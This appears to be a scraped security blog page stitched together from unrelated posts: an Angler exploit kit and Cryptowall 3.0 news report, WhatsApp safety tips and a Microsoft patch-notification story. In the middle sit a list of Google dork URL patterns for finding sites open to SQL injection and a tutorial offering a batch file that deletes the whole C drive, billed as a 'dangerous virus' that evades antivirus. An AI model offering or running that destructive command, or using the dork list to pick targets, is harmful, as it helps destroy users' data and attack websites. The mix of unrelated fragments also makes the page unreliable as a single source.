Angler Exploit Kit’s Cryptowall 3.0 Campaign Highly Evasive

The SANS Internet Storm Center is reporting that the Angler exploit kit (EK) serving up Cryptowall 3.0 ransomware has been evolving rapidly by altering its URL patterns on almost daily basis.

“The changes accumulate, and you might not recognize current traffic generated by Angler. After two weeks of vacation, I almost didn’t recognize it,” wrote Brad Duncan.

“Angler pushes different payloads, but we’re still seeing a lot of CryptoWall 3.0 from this EK. We first noticed CryptoWall 3.0 from Angler near the end of May 2015.”

The first week of the current malware spam campaign had an attachment namedmy_resume.zip that contained an HTML file namedmy_resume.svg which downloaded the Cryptowall 3.0 ransomware from a compromised server, but the attackers have made some adjustments.

“The extracted HTML file names use random numbers, with names likeresume4210.html orresume9647.html. Furthermore, the CryptoWall is now hosted on various docs.google.com URLs. If you open one of these HTML files, your browser will generate traffic to a compromised server,” Duncan said last month.

“The return traffic is gzip compressed, so you won’t see it in the TCP stream from Wireshark. Exporting the text from Wireshark shows HTML that points to a shared document from a Google server. Examining the traffic in Wireshark, you’ll find see a chain of events leading from the compromised server to docs.google.com.”

The team also detected the Angler exploit kit pushing CryptoWall 3.0 on 2015-05-26, the first time they had seen version 3.0 of CryptoWall used by Angler.

“In each case I’ve documented, the bitcoin address for the ransom payment was 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB. Angler EK is still being used by other groups to send different malware payloads. However, the appearance of CryptoWall 3.0 in Angler since 2015-06-26 using the same bitcoin address indicates this is a separate campaign by a specific actor,” Duncan said.

“The timing of these two campaigns, along with their consistent use of the same bitcoin addresses for the ransom payment, suggest they are related. They may have been initiated by the same actor. This is a significant trend in our current threat landscape.”

As recently as March 2015, researchers saw CryptoWall 3.0 being propagated through spam emails that came with a JavaScript attachment which posed as a resume inside an archive file.

The .JS file would connect to two URLs to download .JPG files, an old technique designed to bypass poorly designed intrusion detection systems (IDS) by disguising the malware as an image file.

The .JS file would execute the one.jpg and two.jpg files after a successful download, which were detected as TROJ_CRYPWAL.YOI and TSPY_FAREIT.YOI, respectively.

The Internet Crime Complaint Center (IC3) – a partnership between the Federal Bureau of Investigation (FBI) and the National White Collar Crime Center (NW3C) – reported recently that 992 U.S. victims of the Cryptowall ransomware campaign have incurred losses in excess of $18 million between April of 2014 and June of 2015.

“Recent IC3 reporting identifies CryptoWall as the most current and significant ransomware threat targeting U.S. individuals and businesses. CryptoWall and its variants have been used actively to target U.S. victims since April 2014,” the IC3 advisory stated.

“The financial impact to victims goes beyond the ransom fee itself, which is typically between $200 and $10,000. Many victims incur additional costs associated with network mitigation, network countermeasures, loss of productivity, legal fees, IT services, and/or the purchase of credit monitoring services for employees or customers.”

Source : http://darkmatters.norsecorp.com/2015/07/06/angler-exploit-kits-cryptowall-3-0-campaign-highly-evasive/

Google Dorks for SQL Injection

Google Dorks for SQL Injection

Google Dorks for SQL Injection

Here is the list of google dorks for sql injection.

        about.php?cartID=
        accinfo.php?cartId=
        acclogin.php?cartID=
        add.php?bookid=
        add_cart.php?num=
        addcart.php?
        addItem.php
        add-to-cart.php?ID=
        addToCart.php?idProduct=
        addtomylist.php?ProdId=
        adminEditProductFields.php?intProdID=
        advSearch_h.php?idCategory=
        affiliate.php?ID=
        affiliate-agreement.cfm?storeid=
        affiliates.php?id=
        ancillary.php?ID=
        archive.php?id=
        article.php?id=
        phpx?PageID
        basket.php?id=
        Book.php?bookID=
        book_list.php?bookid=
        book_view.php?bookid=
        BookDetails.php?ID=
        browse.php?catid=
        browse_item_details.php
        Browse_Item_Details.php?Store_Id=
        buy.php?
        buy.php?bookid=
        bycategory.php?id=
        cardinfo.php?card=
        cart.php?action=
        cart.php?cart_id=
        cart.php?id=
        cart_additem.php?id=
        cart_validate.php?id=
        cartadd.php?id=
        cat.php?iCat=
        catalog.php
        catalog.php?CatalogID=
        catalog_item.php?ID=
        catalog_main.php?catid=
        category.php
        category.php?catid=
        category_list.php?id=
        categorydisplay.php?catid=
        checkout.php?cartid=
        checkout.php?UserID=
        checkout_confirmed.php?order_id=
        checkout1.php?cartid=
        comersus_listCategoriesAndProducts.php?idCategory=
        comersus_optEmailToFriendForm.php?idProduct=
        comersus_optReviewReadExec.php?idProduct=
        comersus_viewItem.php?idProduct=
        comments_form.php?ID=
        contact.php?cartId=
        content.php?id=
        customerService.php?****ID1=
        default.php?catID=
        description.php?bookid=
        details.php?BookID=
        details.php?Press_Release_ID=
        details.php?Product_ID=
        details.php?Service_ID=
        display_item.php?id=
        displayproducts.php
        downloadTrial.php?intProdID=
        emailproduct.php?itemid=
        emailToFriend.php?idProduct=
        events.php?ID=
        faq.php?cartID=
        faq_list.php?id=
        faqs.php?id=
        feedback.php?title=
        freedownload.php?bookid=
        fullDisplay.php?item=
        getbook.php?bookid=
        GetItems.php?itemid=
        giftDetail.php?id=
        help.php?CartId=
        home.php?id=
        index.php?cart=
        index.php?cartID=
        index.php?ID=
        info.php?ID=
        item.php?eid=

Learn To Make Dangerous Virus In A Minute

Learn To Make Dangerous Virus In A Minute

In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

       @Echo off
       Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Safety tips to follow while using WhatsApp.

Safety tips to follow while using WhatsApp.

1. Never send private information like bank account details, PINs or passwords through WhatsApp.

2. Never accept files or begin downloads from messages sent to you by strangers or unknown numbers.

3. Never respond to suspicious messages that come through from unknown numbers.

4. WhatsApp as a service will never contact you through a WhatsApp message.

5. Never trust any message that claims to come from WhatsApp and demands some payment for the service.

6. Some scams say they can connect your PC with WhatsApp and send messages from a desktop. Do not believe these as this is not possible.

7. Keep automatic downloads disabled so that you can always keep a check on what is being downloaded.

8. Avoid using WhatsApp when you are connected to open Wi-Fi networks. These are hunting grounds for malware authors and data sniffers.

9. Always keep an updated antivirus security solution installed and updated on your mobile device.

10.Lock WhatsApp with Secure Password.

11. Remember to log out of WhatsApp Web.

12. Always use whatsapp Privacy options carefully.

Source:OoPpSs Group And Whatsapp

Microsoft Kills Public Patch Tuesday Advance Notifications; Now for Paid Members Only

Microsoft began issuing Patch Tuesday updates publically in advance over ten years ago, but from next every second Tuesday of the Month, if you want to see what security patches Microsoft is going to issue, then you will have to pay for it.

UPDATE ALERTS FOR PAID CUSTOMERS ONLY

Yes right, Microsoft has decided to ditch its Advanced Notification Service (ANS) and will no longer be releasing a public blog post to preview what is to come on Patch Tuesday.

Microsoft is facing fierce criticism by industry experts for its decision to make advanced security bulletin available only to those who pay a premium.

Note: Only advance notifications are now paid, but security updates/patches are free.

NO MORE "OUT-OF-BAND" PUBLIC SECURITY ALERTS

In the post on the Microsoft Security Response Center blog, Chris Betz, senior director at Microsoft's security research arm, said:

"more and more customers today are seeking to cut through the clutter and obtain security information tailored to their organizations. Rather than using ANS to help plan security update deployments, customers are increasingly turning to Microsoft Update and security update management tools such as Windows Server Update Service to help organize and prioritize deployment. Customers are also moving to cloud-based systems, which provide continuous updating."

The change in Microsoft's Advanced Notification Service (ANS) also applies to the occasional alerts that Microsoft issued when it gave customers a heads-up about an impending emergency patch i.e. public alerts for "out-of-band” updates.

WHAT-THE-HACK [FREE ADVANCE ALERTS]

Within a couple of hours after the Microsoft announcement, we were getting Whatsapp messages and emails from our readers and colleagues about it and none of them seemed to be happy about the decision. But don't be sad because there is a hack to get advance notification without being a premium Microsoft member.

A Microsoft spokesperson informed ZDnet author that those who receive the advanced notification service information won’t have to sign an NDA. That means anyone from premium member is free to publish it publicly just after receiving advance notices.

MICROSOFT's my Bulletins DASHBOARD

Microsoft has offered an alternative way for administrators who aren't Microsoft customers to see which patches and updates they need to apply. myBulletins - a new online security bulletin customization service which is all responsible for identifying, monitoring and managing patching and security for the organisation.

Unfortunately, myBulletins does not send notifications - you must log in using your Microsoft Account to the service to see the security bulletins.